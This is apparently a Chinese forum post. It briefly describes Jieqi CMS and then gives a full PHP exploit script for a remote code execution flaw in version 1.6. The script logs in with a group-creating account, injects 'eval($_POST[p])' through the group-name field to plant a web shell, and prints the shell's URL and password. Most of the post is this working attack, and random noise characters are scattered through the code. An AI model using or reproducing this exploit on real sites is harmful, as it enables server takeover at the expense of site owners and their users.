杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。% {. K. F% c. v; l d( @/ ?
8 u# D) \% C5 g5 u5 U8 z: \0 S/ P 0 M1 W1 y$ U1 n D
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
! O. I6 E d* K n7 H$ }& i 需要有一个能创建圈子的用户。) p0 q2 |& A& [7 |3 B; G. o$ g. F
& z- s: Q9 g* Y3 ^7 m<?php1 J8 ` M* ]2 y3 X2 D
" U. G6 Z. ~4 A) }6 c) w5 [print_r('. F" J8 o- {: h9 r( k1 q
+---------------------------------------------------------------------------+
# y% E; v5 t+ q1 DJieqi CMS V1.6 PHP Code Injection Exploit" _1 S$ j) N8 h+ y# m
by flyh4t6 H3 Y5 m4 w9 U) N0 i
mail: phpsec at hotmail dot com( f: i, Y. \: p8 }" m1 Z$ }
team: http://www.wolvez.org, h# T+ U. L8 [& C X
+---------------------------------------------------------------------------+8 j6 U, U6 w! v' g
'); /**4 {' J( s' Z- m+ ^6 `5 t1 j# B
* works regardless of php.ini settings
. I) i1 i& b7 P$ @; h- ]+ O*/ if ($argc < 5) { print_r('
# K) w% g$ l0 b+ S9 n0 G+---------------------------------------------------------------------------+
: q1 o$ t8 [5 aUsage: php '.$argv[0].' host path username
. @" Q( m, t8 ^9 m2 ?* khost: target server (ip/hostname)$ x5 j0 q; a7 ?& E1 `
path: path to jieqicms 5 S: F. p9 ]$ `2 G. z- J
uasename: a username who can create group C8 z: E. ~5 ~& [; f* d, Y
Example:
( [2 L) K, ]: t0 u$ [9 H# Nphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
4 |0 ^+ P& Y# _+---------------------------------------------------------------------------+
: I, |# X" p ~$ v/ \6 t/ |' g. k7 c# K'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799612 y5 g* h! Z7 k( W8 \4 t
Content-Disposition: form-data; name="gname". I' {8 X0 K; F$ M" S
3 p, P: f4 ] U) L: O$ O+ N5 h
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
3 h: N$ Y. ]7 J4 f7 O" H. d-----------------------------23281168279961" u \* k0 {( V, X
Content-Disposition: form-data; name="gcatid"' j5 R+ g) S. S1 h R1 x8 p
0 s4 b% ^( a5 {6 x/ }0 A% ~1+ _) b3 }4 f }/ t4 Z
-----------------------------23281168279961
) G3 q2 C" W$ Q% c* V' }Content-Disposition: form-data; name="gaudit"0 j q: X/ V1 D- @! @+ `
4 n% X+ E: e" Q0 w
1+ \3 i t: Q" a' b) }% E
-----------------------------23281168279961' y2 ]7 g% F1 e% Z; X. E$ b
Content-Disposition: form-data; name="gbrief"7 {4 o# u5 h; }" ~* V3 C c
' X* J0 `! z) x3 P o
1
: }, ^% s& V/ K' ?/ C-----------------------------23281168279961--2 U! g3 B( V6 m9 M
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
2 u8 b a" ~! G% }; b" V
5 m1 l9 K; U" hpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对